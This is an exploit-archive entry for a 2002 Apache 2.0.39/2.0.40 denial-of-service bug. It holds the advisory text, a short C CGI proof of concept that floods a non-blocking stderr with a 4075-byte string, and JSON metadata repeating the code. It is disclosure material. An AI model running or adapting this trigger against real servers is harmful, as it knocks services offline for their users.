Search...

Apache 2.0.3940 - Oversized STDERR Buffer Denial of Service

2002-09-24T00:00:00

ID EXPLOITPACK:7050E9A298E6F8992BEE423E07D2BBF4
Type exploitpack
Reporter K.C. Wong
Modified 2002-09-24T00:00:00

Description

Apache 2.0.3940 - Oversized STDERR Buffer Denial of Service

                                        
                                            // source: https://www.securityfocus.com/bid/5787/info

Apache is prone to a denial of service condition when an excessive amount of data is written to stderr. This condition reportedly occurs when the amount of data written to stderr is over the default amount allowed by the operating system.

This may potentially be an issue in web applications that write user-supplied data to stderr. Additionally, locally based attackers may exploit this issue. 

This issue has been confirmed in Apache 2.0.39/2.0.40 on Linux operating systems. Apache on other platforms may also be affected. This issue does not appear to be present in versions prior to 2.0.x.

// Credit to: K.C. Wong
#include &lt;stdio.h&gt;
#include &lt;time.h&gt;
#include &lt;unistd.h&gt;
#include &lt;fcntl.h&gt;

#define SIZE 4075

void out_err()
{
        char buffer[SIZE];
        int i = 0;

        for (i = 0; i &lt; SIZE - 1; ++i)
                buffer[i] = 'a' + (char )(i % 26);

        buffer[SIZE - 1] = '\0';

//
fcntl(2, F_SETFL, fcntl(2, F_GETFL) | O_NONBLOCK);

        fprintf(stderr, "short test\n");
        fflush(stderr);

        fprintf(stderr, "test error=%s\n", buffer);
        fflush(stderr);
} // out_err()

int main(int argc, char ** argv)
{
        fprintf(stdout, "Context-Type: text/html\r\n");
        fprintf(stdout, "\r\n\r\n");
        out_err();
        fprintf(stdout, "&lt;HTML&gt;\n");
        fprintf(stdout, "&lt;body&gt;\n");
        fprintf(stdout, "&lt;h1&gt;hello world&lt;/h1&gt;\n");
        fprintf(stdout, "&lt;/body&gt;\n");
        fprintf(stdout, "&lt;/HTML&gt;\n");
        fflush(stdout);
        exit(0);
} // main()

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:03", "references": [], "description": "\nApache 2.0.3940 - Oversized STDERR Buffer Denial of Service", "edition": 1, "reporter": "K.C. Wong", "exploitpack": {"type": "dos", "platform": "linux"}, "published": "2002-09-24T00:00:00", "title": "Apache 2.0.3940 - Oversized STDERR Buffer Denial of Service", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:03", "rev": 2}, "score": {"value": -0.2, "vector": "NONE", "modified": "2020-04-01T19:04:03", "rev": 2}, "vulnersScore": -0.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2002-09-24T00:00:00", "id": "EXPLOITPACK:7050E9A298E6F8992BEE423E07D2BBF4", "href": "", "viewCount": 1, "sourceData": "// source: https://www.securityfocus.com/bid/5787/info\n\nApache is prone to a denial of service condition when an excessive amount of data is written to stderr. This condition reportedly occurs when the amount of data written to stderr is over the default amount allowed by the operating system.\n\nThis may potentially be an issue in web applications that write user-supplied data to stderr. Additionally, locally based attackers may exploit this issue. \n\nThis issue has been confirmed in Apache 2.0.39/2.0.40 on Linux operating systems. Apache on other platforms may also be affected. This issue does not appear to be present in versions prior to 2.0.x.\n\n// Credit to: K.C. Wong\n#include <stdio.h>\n#include <time.h>\n#include <unistd.h>\n#include <fcntl.h>\n\n#define SIZE 4075\n\nvoid out_err()\n{\n char buffer[SIZE];\n int i = 0;\n\n for (i = 0; i < SIZE - 1; ++i)\n buffer[i] = 'a' + (char )(i % 26);\n\n buffer[SIZE - 1] = '\\0';\n\n//\nfcntl(2, F_SETFL, fcntl(2, F_GETFL) | O_NONBLOCK);\n\n fprintf(stderr, \"short test\\n\");\n fflush(stderr);\n\n fprintf(stderr, \"test error=%s\\n\", buffer);\n fflush(stderr);\n} // out_err()\n\nint main(int argc, char ** argv)\n{\n fprintf(stdout, \"Context-Type: text/html\\r\\n\");\n fprintf(stdout, \"\\r\\n\\r\\n\");\n out_err();\n fprintf(stdout, \"<HTML>\\n\");\n fprintf(stdout, \"<body>\\n\");\n fprintf(stdout, \"<h1>hello world</h1>\\n\");\n fprintf(stdout, \"</body>\\n\");\n fprintf(stdout, \"</HTML>\\n\");\n fflush(stdout);\n exit(0);\n} // main()", "cvss": {"score": 0.0, "vector": "NONE"}}